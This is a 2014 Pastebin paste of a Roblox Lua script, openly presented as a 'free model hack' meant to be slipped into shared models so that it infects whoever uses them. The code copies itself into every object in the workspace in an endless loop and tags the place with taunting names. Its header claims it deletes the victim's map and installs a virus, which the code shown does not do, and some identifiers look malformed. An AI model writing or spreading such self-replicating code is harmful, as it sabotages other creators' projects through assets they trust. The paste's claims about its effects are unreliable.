The_Newt

[ROBLOX] Newt's Free Model Hack v1.0b

Sep 30th, 2014
323
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.84 KB | None | 0 0
  1. --[[
  2. updated 30-09-2014
  3. this is a free model hack. insert it into a model for others to use.
  4. it then deletes the victim's entire map and inserts a virus into roblox studio.
  5. programmed by NewtPewt
  6. ]]--
  7.  
  8. if script.parent.sclassname ~= "rotatep" then
  9.     local p = instance.new("rotatep")
  10.     p.parent = workspace
  11.     p.name = "REKT! YOU GOT OWNED!"
  12.     script.parent = p
  13. end
  14. function check()
  15.     local list = workspace:getchildren()
  16.     for i = 1, #list do
  17.         if list[i]:findfirstchild("REKT! YOU GOT OWNED!") == nil and list[i].classname ~= "rotatep" then
  18.             script.parent:clone().parent = list[i]
  19.         end
  20.         wait()
  21.     end
  22. end
  23. while true do
  24.     check()
  25.     if workspace:findfirstchild("Hacked by Newt! BOOM HEADSHOT!") == nil then
  26.         local main = script.parent:clone()
  27.         main.name = "Hacked by Newt! BOOM HEADSHOT!"
  28.         main.parent = workspace
  29.     end
  30.     wait(10)
  31. end
Add Comment
Please, Sign In to add comment